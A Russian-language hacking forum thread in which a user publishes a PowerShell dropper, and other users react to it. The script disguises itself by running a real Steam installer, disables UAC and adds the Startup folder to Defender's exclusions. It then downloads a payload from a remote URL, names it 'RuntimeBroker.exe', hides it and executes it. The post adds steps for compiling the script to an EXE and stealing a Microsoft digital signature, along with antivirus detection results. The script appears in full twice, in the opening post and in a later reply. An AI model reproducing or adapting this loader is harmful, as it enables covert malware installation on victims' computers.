Статья Windows Defender Bypass + UAC Bypass + Loader [1.431.40.0]

[hijack]

Проверялось на Windows 10, Microsoft Defender 1.431.40.0 (актуальное обновление состоянием на 15.06.2025).
Нуждается в проверке на Windows 11, буду благодарен за проверку и отзыв.

Что необходимо:
Python
(Необходим для работы SigThief).
PS2EXE
(Программа для компиляции *.ps1 файлов в исполняемый *.exe файл).
SigThief
(Программа для копирования цифровой подписи файла).

Возможности скрипта:

• Обход Microsoft Defender.
• Обход UAC (User Account Control).
• Установка и запуск любого файла с удалённого/локального сервера.
• Маскировка под легитимную программу/установщик.
• Работает даже на голой версии Windows т.к. это скрипт PowerShell.

Код:

# Переходим в папку "C:/Users/Name/AppData/Roaming".
cd "$env:APPDATA"
# Маскируем наш файл под установщик Steam/любого другого ПО, посредством загрузки и запуска официального инсталятора.
## Измените ссылку в кавычках после -Uri на свою или оставьте как есть чтобы установить Steam.
## Измените название файла в кавычках после -OutFile на своё или оставьте как есть.
Invoke-WebRequest -Uri "https://cdn.fastly.steamstatic.com/client/installer/SteamSetup.exe" -OutFile "SteamSetup.exe"
# Запускаем установщик Steam.
## Важно чтобы название файла совпадало с названием в -OutFile функции Invoke-WebRequest.
Start-Process -FilePath "SteamSetup.exe"

# Отключаем UAC (Работает только после перезагрузки компьютера).
ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLUA -Value 0
# Добавляем папку "Автозагрузка" в исключения Microsoft Defender.
Set-MpPreference -ExclusionPath "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"

# Переходим в папку "Автозагрузка".
cd "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
# Загружаем полезную нагрузку с удалённого/локального сервера в папку Автозагрузки.
## Измените ссылку в кавычках после -Uri на свою.
## Измените название файла в кавычках после -OutFile на своё или оставьте как есть.
Invoke-WebRequest -Uri "http://www.link.to/file.exe" -OutFile "RuntimeBroker.exe"
# Делаем файл невидимым для пользователя ("Показывать скрытые папки и файлы", не поможет).
attrib +h +s "RuntimeBroker.exe"
# Запускаем нашу полезную нагрузку.
Start-Process -FilePath "RuntimeBroker.exe"

# Перезагрузка (Для выключения UAC, нежелательно поэтому закомментировал, т.к. выглядит подозрительно, рано или поздно компьютер всё равно перезагрузят).
# shutdown /s /t 5 /c "Для корректной работы программы необходима перезагрузка!"

Редактирование и компиляция:

1. Создайте текстовый документ с расширением файла *.ps1
2. Скопируйте код в файл.
3. Измените код под комментарием из двух решёток (##) под себя и сохраните.
4. Скачайте PS2EXE с Github.
5. Скомпилируйте с помощью PS2EXE файл *.ps1 в *.exe с настройками как показано на рисунке ниже.
6. Подпишите файл цифровой подписью с помощью SigThief.

Virus Total:
Без цифровой подписи (20/72)
С цифровой подписью Microsoft Windows (11/72)

Детектится в основном ноунейм АВ которыми практически никто не пользуется, чтобы убедиться смотрите ссылки на VT.
Исключения: BitDefender, Google, McAfee Scanner.

 

[ski]

100 reactions

 

[hijack]

100 reactions

Considering that such tools are sold for money here, 100 reactions is not much.
But okay, I'll be lenient, made the preview available with 50 reactions, don't forget to say thanks!

 

[molotov477]

Considering that such tools are sold for money here, 100 reactions is not much.
But okay, I'll be lenient, made the preview available with 50 reactions, don't forget to say thanks!

While you make a good point but to be honest, even 50 reactions are a bit much. But hey, it's your post, you decide how you want to go about it.

 

[hijack]

While you make a good point but to be honest, even 50 reactions are a bit much. But hey, it's your post, you decide how you want to go about it.

I'll go down to 25 in a week, I'll leave it as is for now.

 

[Fooll Zero]

While you make a good point but to be honest, even 50 reactions are a bit much. But hey, it's your post, you decide how you want to go about it.

Почему ты решаешь что это перебор? Автор указал как считает нужным. А твое сообщение, точно таже как и сообщение ski можно расценить как выпрашивание, что на данном форуме запрещено.

 

[molotov477]

Почему ты решаешь что это перебор? Автор указал как считает нужным. А твое сообщение, точно таже как и сообщение ski можно расценить как выпрашивание, что на данном форуме запрещено.

I apologize if it seemed as if I was begging, that was not the case. I agree with you and that is my why I said it was his post and he is entitled to put the limit as he sees fit.

 

[proexp]

Проверялось на Windows 10, Microsoft Defender 1.431.40.0 (актуальное обновление состоянием на 15.06.2025).
Нуждается в проверке на Windows 11, буду благодарен за проверку и отзыв.

Что необходимо:
Python
(Необходим для работы SigThief).
PS2EXE
(Программа для компиляции *.ps1 файлов в исполняемый *.exe файл).
SigThief
(Программа для копирования цифровой подписи файла).

Возможности скрипта:

• Обход Microsoft Defender.
• Обход UAC (User Account Control).
• Установка и запуск любого файла с удалённого/локального сервера.
• Маскировка под легитимную программу/установщик.
• Работает даже на голой версии Windows т.к. это скрипт PowerShell.

Код:
Скрытое содержимое
Редактирование и компиляция:

1. Создайте текстовый документ с расширением файла *.ps1
2. Скопируйте код в файл.
3. Измените код под комментарием из двух решёток (##) под себя и сохраните.
4. Скачайте PS2EXE с Github.
5. Скомпилируйте с помощью PS2EXE файл *.ps1 в *.exe с настройками как показано на рисунке ниже.
6. Подпишите файл цифровой подписью с помощью SigThief.

Virus Total:
Без цифровой подписи (20/72)
С цифровой подписью Microsoft Windows (11/72)

Детектится в основном ноунейм АВ которыми практически никто не пользуется, чтобы убедиться смотрите ссылки на VT.
Исключения: BitDefender, Google, McAfee Scanner.

Какой смысл если его в гугле при скачивание будет блокировать?

 

[RT_MAX]

I find it interesting, I would like to try it.

 

[Bug_Lord]

can i have your tg or somthing?

 

[green88]

полезная статья, хочу проверить на Win11, ТС открой хайд пожалуйста

 

[Stupor]

Прям секрет полишинеля Нафига вообще эта школьная пиздопляска, если дохрена если:
1. А с чего это в винде по умолчанию ps разрешены?
2. Палевность выхода с Ps2EXE, что вирустотал уже панацея?
3. Может тогда в исключения фаервола тоже
4. Самое главное: и нахера все это? если мы права админа запрашиваем и они у нас будут.
Я про аттрибут "системный " угараю
Вывод: сними хайд не позорься.

 

[xChimera]

Полная х#йня

Объективной критики не ждите, ее здесь даже не надо

 

[hijack]

Снял хайд, т.к. по состоянию на 16.06.25 19:00, Microsoft Defender обновился до версии [1.431.57.0] и определил файл как:
Trojan:Win32/Sonbokli.A!cl

+ Новый результат VT спустя +-24 часа.:
Без цифровой подписи:
23/52
С цифровой подписью:
20/72

UPD. Не могу редактировать первое сообщение поэтому код который находится под хайдом тут:

# Переходим в папку "C:/Users/Name/AppData/Roaming".
cd "$env:APPDATA"
# Маскируем наш файл под установщик Steam/любого другого ПО, посредством загрузки и запуска официального инсталятора.
## Измените ссылку в кавычках после -Uri на свою или оставьте как есть чтобы установить Steam.
## Измените название файла в кавычках после -OutFile на своё или оставьте как есть.
Invoke-WebRequest -Uri "https://cdn.fastly.steamstatic.com/client/installer/SteamSetup.exe" -OutFile "SteamSetup.exe"
# Запускаем установщик Steam.
## Важно чтобы название файла совпадало с названием в -OutFile функции Invoke-WebRequest.
Start-Process -FilePath "SteamSetup.exe"

# Отключаем UAC (Работает только после перезагрузки компьютера).
ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLUA -Value 0
# Добавляем папку "Автозагрузка" в исключения Microsoft Defender.
Set-MpPreference -ExclusionPath "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"

# Переходим в папку "Автозагрузка".
cd "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
# Загружаем полезную нагрузку с удалённого/локального сервера в папку Автозагрузки.
## Измените ссылку в кавычках после -Uri на свою.
## Измените название файла в кавычках после -OutFile на своё или оставьте как есть.
Invoke-WebRequest -Uri "http://www.link.to/file.exe" -OutFile "RuntimeBroker.exe"
# Делаем файл невидимым для пользователя ("Показывать скрытые папки и файлы", не поможет).
attrib +h +s "RuntimeBroker.exe"
# Запускаем нашу полезную нагрузку.
Start-Process -FilePath "RuntimeBroker.exe"

 

[Mitnick]

if you real want to get members to buy you need to share video

 

[nishimura]

Looks very interesting,but these reactions...

EDIT:
I'm sorry if my previous sentence caused any bad feelings in someone.
What I meant to say is that i'm sorry i don't get that many reactions.
I didn't mean to offend anyone.
If I did offend someone, I sincerely apologize once again.

 

[DarkBLUP]

Если честно по заголовку статьи я ожидал куда большего… на самом деле это ужасное подобие дропперу. Думаю автор не особо компетентный в сфере малварь дева да и кодинга в целом. Такое «чудо» можно написать на любом скриптовом ЯП, допустим на Python и так же скомпилировать… Уже ни один раз говорили по поводу исключений Windows Defender… Подписание «сертом» - этот метод уже по-моему изжил себя, ты же понимаешь что у тебя детекты пропали далеко не из за этого чудо сертификата от легитимной программы, а из за того что файл изменился, его хеш, сигнатура итд итп, таким образом можно легко напихать левых сгенерированных байтов и так же убрать пару детектов. Никакого тут Defender Bypass нет, ты просто написал дроппер которого нет в базах дефа, могу поспорить с тобой что после пролива хотя бы 10 инсталлов твой скрипт уже будет мёртв. Такие чудо болванки работали в году так 2020 и то не особо. Сейчас даже и правда хорошо написанный нативный софт на сискаллах АВеры жрут, а ты предлагаешь паковать скрипты ps1 )))

 

[woo097878780]

Anyone with a bit of common sense knows this is meaningless

 

[hijack]

Если честно по заголовку статьи я ожидал куда большего… на самом деле это ужасное подобие дропперу. Думаю автор не особо компетентный в сфере малварь дева да и кодинга в целом. Такое «чудо» можно написать на любом скриптовом ЯП, допустим на Python и так же скомпилировать… Уже ни один раз говорили по поводу исключений Windows Defender… Подписание «сертом» - этот метод уже по-моему изжил себя, ты же понимаешь что у тебя детекты пропали далеко не из за этого чудо сертификата от легитимной программы, а из за того что файл изменился, его хеш, сигнатура итд итп, таким образом можно легко напихать левых сгенерированных байтов и так же убрать пару детектов. Никакого тут Defender Bypass нет, ты просто написал дроппер которого нет в базах дефа, могу поспорить с тобой что после пролива хотя бы 10 инсталлов твой скрипт уже будет мёртв. Такие чудо болванки работали в году так 2020 и то не особо. Сейчас даже и правда хорошо написанный нативный софт на сискаллах АВеры жрут, а ты предлагаешь паковать скрипты ps1 )))

Я не мастер заголовков, есть такое.
Так же я не претендую на звание "разработчика малвари" или "гуру", я просто поделился тем с чем работал сам.
Подобие этого скрипта, работало около года, если не больше без каких либо нареканий, но инсталлы я не покупал и работал он у меня на 4х машинах.

Ещё хотел сказать, я 06.03.2024 написал тикет в MSRC (Microsoft Security Research Portal) и вот их ответ по поводу похожего скрипта:

Еще раз благодарим вас за отправку этой проблемы в Microsoft. В настоящее время MSRC отдает приоритет уязвимостям, которые оцениваются как «Важные» или «Критические», для немедленного обслуживания. После тщательного расследования данный случай был оценен как незначительный и не соответствует требованиям MSRC к немедленному обслуживанию. Тем не менее, мы поделились отчетом с командой, ответственной за поддержку продукта или услуги. Они примут необходимые меры, чтобы обеспечить защиту клиентов.

Во время оценки я вижу, что инженерная служба обнаружила следующее в отчете:

В отчете говорится, что можно добавить исключения в Microsoft Defender, а затем запустить вредоносное ПО из этих папок. Это сделано специально.

И ровно с того момента по недавнее время, всё работало.

 

[hijack]

Прям секрет полишинеля Нафига вообще эта школьная пиздопляска, если дохрена если:
1. А с чего это в винде по умолчанию ps разрешены?
2. Палевность выхода с Ps2EXE, что вирустотал уже панацея?
3. Может тогда в исключения фаервола тоже
4. Самое главное: и нахера все это? если мы права админа запрашиваем и они у нас будут.
Я про аттрибут "системный " угараю
Вывод: сними хайд не позорься.

1. PowerShell является мощным средством автоматизации и управления, встроенным в Windows. Он использует собственный язык сценариев на основе .NET и позволяет выполнять различные системные задачи.
2. Не спорю, PS2EXE вызывает серьёзные подозрения, но оно работало - это раз, во вторых это не 0-day уязвимость, а обычный скрипт с помощью которого можно было обойти MD и установить малварь.
3. Можно и так, всё зависит от вашей фантазии.
4. Скачай и установи Quasar к примеру, имея права админа в наличии и не добавляя исключения и т.д. вручную и расскажи мне что тебе скажет твой АВ.

Спойлер: Пример:

Вот скачал ты софт где-то из интернета, не важно что за софт, установщик или исполняемый файл, большинство из них будут запрашивать права админа, даже легитимный софт которому ты доверяешь на все 100%
И вот софт установился, ты довольный, а где-то на просторах твоей ОС уже отработал стиллер.

5. Снял уже давно, мне не стыдно.